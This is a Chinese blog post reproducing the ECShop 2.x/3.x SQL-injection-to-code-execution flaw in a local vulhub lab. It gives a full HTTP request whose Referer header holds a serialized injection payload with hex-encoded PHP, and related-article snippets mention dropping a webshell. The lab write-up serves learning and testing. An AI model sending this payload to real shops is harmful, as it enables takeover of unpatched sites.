ECShop 2.x/3.x SQL注入/任意代码执行漏洞复现

最新推荐文章于 2024-07-18 16:43:09 发布
最新推荐文章于 2024-07-18 16:43:09 发布
阅读量338 收藏
点赞数
分类专栏: 漏洞 文章标签: sql 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51387754/article/details/121328065
版权
本文详细介绍了ECShop在2017年前版本中存在的SQL注入漏洞,该漏洞允许攻击者注入恶意数据,可能导致任意代码执行。复现过程中,展示了如何利用特定的GET请求参数构造恶意payload来触发漏洞。此问题影响ECShop的2.x和3.x版本。
摘要由CSDN通过智能技术生成

漏洞原理

ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。

其2017年及以前的版本中,存在一处SQL注入漏洞 ,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞。
影响版本
ECShop 2.x
ECShop 3.x

漏洞复现

(root💀guiltyfet)-[/home/guiltyfet/vulhub/ecshop/xianzhi-2017-02-82239600]
└─# docker-compose up -d
Creating network "xianzhi-2017-02-82239600_default" with the default driver

在这里插入图片描述8081页面2.7.3的安装页面
在这里插入图片描述
点击下一步
在这里插入图片描述

在这里插入图片描述在这里插入图片描述localhost修改为mysql
在这里插入图片描述在这里插入图片描述对抓包并修改为以下数据

GET /user.php?act=login HTTP/1.1

Host: 127.0.0.1:8081

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Cookie: PHPSESSID=9odrkfn7munb3vfksdhldob2d0; ECS_ID=1255e244738135e418b742b1c9a60f5486aa4559; ECS[visit_times]=1

Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

在这里插入图片描述

GuiltyFet
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ECShop_V2.6.2_UTF8_Release0326.zip
02-04
然而,这个版本存在一些重要的安全问题,特别是关于"ecshop2.2 ecshop2.x代码执行漏洞"的标签所提及的,这是一个对系统安全性构成威胁的重要知识点。 1. **代码执行漏洞**:在ECShop V2.6.2中,存在代码执行漏洞,...
BaizeSec#bylibrary#ecshop2.x_命令执行1
07-25
代码执行在网站根目录下生成1.php的一句话。
Ecshop 2.x_3.x SQL注入代码执行漏洞复现和分析
weixin_30652271的博客
09-13 703
0x00 前言 问题发生在user.php的的显示函数,模版变量可控,导致注入,配合注入可达到远程代码执行 0x01 漏洞分析 1.SQL注入 先看user.php的$ back_act变量来源于HTTP_REFERER,我们可控。 分配函数用于在模版变量里赋值 再看显示函数, 读取user_passport.dwt模版文件内容,显示解析变量后的HTML内容,用_ech...
ECShop 2.x3.x SQL注入任意代码执行漏洞
黑白的博客
12-22 431
声明 好好学习,天天向上 漏洞描述 DNS协议支持使用axfr类型的记录进行区域传送,用来解决主从同步的问题。如果管理员在配置DNS服务器的时候没有限制允许获取记录的来源,将会导致DNS域传送漏洞。 影响范围 ECShop 2.x ECShop 3.x 复现过程 这里使用2.7.3与3.6.0版本 使用vulhub /app/vulhub-master/ecshop/xianzhi-2017-02-82239600 使用docker启动 docker-compose build docker-compos
ecshop 2.x/3.x SQL注入/代码执行
最新发布
qq_23003811的博客
07-18 241
ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。其2017年及以前的版本中,存在一处SQL注入漏洞,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞,其3.6.0最新版已修复该漏洞。3、在Referer处修改payload。1、漏洞发生是在会员登录页面。2、生成payload的脚本。
Ecshop 2.x/3.x SQL注入/任意代码执行漏洞
Baidu_Secrity的博客
09-07 663
近日,Ecshop爆出全版本SQL注入任意代码执行漏洞,受影响的版本有:Ecshop 2.xEcshop 3.x-3.6.0该漏洞产生的根本原因在于Ecshop系统的user.php文...
ECShop 2.x / 3.x SQL注入/远程执行代码漏洞 xianzhi-2017-02-82239600 漏洞复现
ADummy的博客
02-24 768
ECShop 2.x / 3.x SQL注入/远程执行代码漏洞 by ADummy 0x00利用路线 ​ Burpsuite抓包—>脚本生成poc—>Burpsuite修改referer字段—>有回显 0x01漏洞介绍 ​ ECShop是一个B2C独立商店系统,供公司和个人快速建立个性化的在线商店。该系统是基于PHP语言和MYSQL数据库体系结构的跨平台开源程序。在2017年及之前的版本中,存在一个SQL注入漏洞,该漏洞可能会注入有效载荷并最终导致代码执行漏洞。最新版本的3.6.0
20 - vulhub - ECShop 2.x/3.x SQL注入/任意代码执行漏洞
易编橙 · 终身成长社群,相遇已是上上签!
11-15 1169
ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 其2017年及以前的版本中,存在一处SQL注入漏洞,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞。其3.6.0最新版已修复该漏洞,vulhub中使用其2.7.3版本与3.6.0次新版本进行漏洞复现。 其实该漏洞复现的意义不是很大,现在都 7.x 8.x 版本了,但是不失为 `了解程序员写bug` 的一种另类方式。
韵达快递Ecshop2.7.X插件
10-10
《韵达快递 Ecshop2.7.X 插件详解及应用》 在电子商务领域,物流配送是至关重要的一环,而Ecshop是一款广受欢迎的开源电商系统,为商家提供了丰富的功能和便捷的操作。针对这一系统,开发者们纷纷推出了各种与之...
transport.js文件(解决ecshop jquery jqzoom冲突)
04-02
transport.js文件(解决ecshop jquery jqzoom冲突)
ecshop商务平台兼容PHP5.6.X的完整安装包
11-23
由于自PHP5.4以后发布的版本去掉了部分原有的旧函数,导致 EcShop2.7.3 电子商务平台在 PHP5.4.X 以上安装失败。这里提供了专门针对PHP5.4.x以后版本的完整安装包,直接安装,一键成功。
ECShop全系列版本远程代码执行漏洞复现
weixin_30726161的博客
09-02 225
前言 问题发生在user.php的display函数,模版变量可控,导致注入,配合注入可达到远程代码执行 漏洞分析 0x01-SQL注入 先看user.php $back_act变量来源于HTTP_REFERER,我们可控。 assign函数用于在模版变量里赋值 再看display函数 读取user_passport.dwt模版文件内容,显示...
ECShop 2.x/3.x SQL注入/远程代码执行漏洞
qq_48039118的博客
04-12 309
进入到/vulhub-master/ecshop/collection_list-sqli/将docker-compose.yml文件的ecshop版本改一下,不然是4.0版本,漏洞被更新了,实现不了。burpsuite不能用8080端口,因为被占用了,导入证书需要信任证书,勾选两个选项,我一开始没信任,导致抓不到包,浪费了不少时间。数据库主机:mysql,端口号:3306,用户名和密码都是root,其他的就随意。我这个是已经安装过的了,没安装的显示是不一样的,命令就是这个。将POC复制,重新发包。
ECShop 2.x/3.x SQL注入/任意代码执行漏洞
EC_Carrot的博客
05-31 425
漏洞背景 ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 其2017年及以前的版本中,存在一处SQL注入漏洞,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞。其3.6.0最新版已修复该漏洞,vulhub中使用其2.7.3最新版与3.6.0次新版进行漏洞复现漏洞复现 我这里用的是vulhub的环境,访问http://your-ip:8080将看到2.7.3的安装页面,访问http://your-ip:8081
ecshop 2.x/3.x sql注入/任意代码执行漏洞
whatday的专栏
07-01 2088
影响版本: Ecshop 2.x Ecshop 3.x-3.6.0 漏洞分析: 该漏洞影响ECShop 2.x和3.x版本,是一个典型的“二次漏洞”,通过user.php文件中display()函数的模板变量可控,从而造成SQL注入漏洞,而后又通过SQL注入漏洞将恶意代码注入到危险函数eval中,从而实现了任意代码执行。 值得一提的是攻击者利用的payload只适用于ECShop 2.x版本导致有部分安全分析者认为该漏洞不影响ECShop 3.x,这个是因为在3.x的版本里有引入防注...
ecshop SQL注入漏洞 admin/shopinfo.php ecshop SQL注入漏洞
Summersblue的博客
10-30 6381
阿里云这点做的很厚道,真心不错/home/wwwroot/admin/shopinfo.php ecshop SQL注入漏洞 先备份好文件后再操作/admin/shopinfo.php修复方法(大概在第53、71、105、123行,4个地方修复方式都一样) admin_priv(‘shopinfo_manage’); 修改为 admin_priv(‘shopinfo
ecshop 解密index.php,ECShop 2.x 3.0代码执行漏洞分析
weixin_33356544的博客
03-19 250
0x00 前言ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。2.x版本跟3.0版本存在代码执行漏洞。0x01 漏洞原理ECShop 没有对 $GLOBAL[‘_SERVER’][‘HTTP_REFERER’] 变量进行验证,导致用户可以将任意代码插入的user_passport.dwt模板中,随后insert_mod根据模板内容动态执行相应的函数,用户插入恶意代码导致...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

GuiltyFet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值